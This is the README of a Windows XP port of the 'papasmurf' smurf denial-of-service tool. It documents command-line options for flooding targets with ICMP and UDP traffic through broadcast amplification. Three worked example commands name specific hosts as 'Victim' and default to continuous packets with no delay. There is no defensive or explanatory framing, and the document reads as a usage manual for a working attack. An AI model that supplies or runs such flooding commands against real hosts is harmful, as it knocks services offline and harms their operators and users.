
  Smurf Attack Version 1.6
  ========================

  This program is the port of papasmurf attack to Windows XP.

  Note: This program is only tested on Windows XP.


  I. USAGE
  ========================

  smurf.exe <victim> <broadcast file> [options]

  Options:
    -p:    Comma separated list of dest ports         (default 7) (0 is random)
    -s:    Source port (for udp only)                 (0 is random (default))
    -P:    Protocols to use. Either icmp, udp or both (default icmp)
    -S:    Data size in bytes                         (default 64)
    -f:    Filename containg data                     (not needed)
    -n:    Num of packets to send                     (0 is continuous (default))
    -d:    Delay (in ms)                              (default 0)

  Example broadcast files are included to make clear that how its format should be.

  Please note that broadcast and data files must be on the active directory or on
  the same directory with the program binary.


  Example I: smurf www.xnet.org bcast.txt

  On this attack:

  - Victim: www.xnet.org
  - Destination Ports: not used on icmp attack.
  - Source Ports: not used on icmp attack.
  - Protocols: icmp
  - Data Size: 64 bytes
  - Data file: not specified
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example II: smurf www.beginner.vg bcast2.txt -P udp -p 7,42 -f data.txt

  On this attack:

  - Victim: www.beginner.vg
  - Destination Ports: 7 + 42
  - Source Ports: Random
  - Protocols: udp
  - Data Size: not used if a data file is specified by user.
  - Data file: data.txt
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)

  Example III: smurf irc.xnet.org bcast2.txt -P both -d 50

  On this attack:

  - Victim: irc.xnet.org
  - Destination Ports: Random
  - Source Ports: Random
  - Protocols: icmp + udp
  - Data Size: 64 bytes
  - Data file: not specified
  - Count: Continuous
  - Delay: 50 ms


  II. CONTACT
  ========================
  MSN: metinsdr@hotmail.com
  UIN: 470734

